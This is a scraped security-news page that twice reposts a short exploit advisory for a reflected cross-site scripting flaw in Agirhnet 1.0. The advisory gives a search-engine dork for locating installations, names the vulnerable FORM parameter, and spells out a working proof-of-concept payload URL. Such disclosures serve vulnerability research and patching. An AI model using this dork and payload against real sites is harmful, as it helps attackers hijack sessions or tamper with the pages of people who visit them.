Published on February 22nd, 2022 📆 | 6404 Views ⚑

Agirhnet 1.0 Cross Site Scripting – Torchsec

# Exploit Title: [Agirhnet] - Reflected XSS via GET
# Google Dork: inurl:agirhnet
# Date: 2022-02-21
# Exploit Author: Daniel Martinez Adan (aDoN90)
# Vendor Homepage: https://agirh.net/
# Version: [app version] 1.0
# CVSS : 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)URL:
https://example.com/AgirhNet/LoadingProgress.aspx?FORM=/%22%0Aconfirm(document.domain)//
vulnerable Parameter : FORM
Payload: /%22%0Aconfirm(document.domain)//











it is compulsory to put the "/" at the beginning of the payload (it has to
recognize it as a URL)

Source link

Tagged with: agirhnet • cross • scripting • Site • torchsec

Exploit/Advisories

Published on February 22nd, 2022 📆 | 3515 Views ⚑

Agirhnet 1.0 Cross Site Scripting – Torchsec

iSpeech.org

# Exploit Title: [Agirhnet] - Reflected XSS via GET
# Google Dork: inurl:agirhnet
# Date: 2022-02-21
# Exploit Author: Daniel Martinez Adan (aDoN90)
# Vendor Homepage: https://agirh.net/
# Version: [app version] 1.0
# CVSS : 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)URL:
https://example.com/AgirhNet/LoadingProgress.aspx?FORM=/%22%0Aconfirm(document.domain)//
vulnerable Parameter : FORM











Payload: /%22%0Aconfirm(document.domain)//
it is compulsory to put the "/" at the beginning of the payload (it has to
recognize it as a URL)

Source link

Tagged with: agirhnet • cross • scripting • Site • torchsec

Comments are closed.

🌟 Your Account

Username/Email Password
Remember Me
Register
🔔 Email Subscriptions

Get new posts by email
- Donate Via Wallets
  MetaMask
  
  Trust Wallet
  
  Binance Wallet
  
  WalletConnect
Popular
- Debian Security Advisory 5664-1 – Torchsec by Admin April 18, 2024 -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5664-1 security@debian.orghttps://www.debian.org/security/… (9)
- Google Sues App Developers Over Fake Crypto… by Admin April 8, 2024 Apr 08, 2024NewsroomInvestment Scam / Mobile Security Google has filed… (8)
- Red Hat Security Advisory 2024-1687-03 – Torchsec by Admin April 9, 2024 The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1687.jsonRed Hat officially shut… (8)
- Kernel Live Patch Security Notice LSN-0102-1 –… by Admin April 9, 2024 Linux kernel vulnerabilitiesA security issue affects these releases of Ubuntu… (7)
Gloss
- Lost In Press on Hackers Exploiting WP-Automatic Plugin Bug to Create Admin Accounts on WordPress Sites
- vikierm on Red Hat Security Advisory 2024-2639-03 – Torchsec
- vilianashf on Ubuntu Security Notice USN-6759-1 – Torchsec
- vikikmg on Ubuntu Security Notice USN-6761-1 – Torchsec
- vikiofb on Ubuntu Security Notice USN-6729-3 – Torchsec
- Irinvff on Okta Warns of Unprecedented Surge in Proxy-Driven Credential Stuffing Attacks
- MichailmoeYI on Major Security Flaws Expose Keystrokes of Over 1 Billion Chinese Keyboard App Users
- MichailmoeYI on Ubuntu Security Notice USN-6745-1 – Torchsec
- EdithImpagGE on Red Hat Security Advisory 2024-1882-03 – Torchsec
- EdithImpagGE on Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Insecure Direct Object Reference – Torchsec
☕️Social Media

Torchsec

Tweets by Torch_sec
👥Members

Newest | Active | Popular
- Lost In Press
  
  registered 14 hours, 22 minutes ago
- Janet Ruggiero
  
  registered 1 day, 4 hours ago
- Ted Daigre
  
  registered 2 days, 8 hours ago
- Abraham Wingate
  
  registered 2 days, 10 hours ago
- Krystle Bogner
  
  registered 2 days, 11 hours ago
🌍 Forum Groups

Newest | Active | Popular | Alphabetical
- General Talk
  
  active 14 hours, 22 minutes ago
- Comments & Suggestions
  
  active 14 hours, 22 minutes ago
- Ebooks – Papers
  
  active 14 hours, 22 minutes ago
- Networking
  
  active 14 hours, 22 minutes ago
- Linux / Open Source
  
  active 14 hours, 22 minutes ago
linktr.ee/obewyn

Agirhnet 1.0 Cross Site Scripting – Torchsec

Agirhnet 1.0 Cross Site Scripting – Torchsec

🌟 Your Account

🔔 Email Subscriptions

Get new posts by email

Donate Via Wallets

Popular

Gloss

☕️Social Media

👥Members

🌍 Forum Groups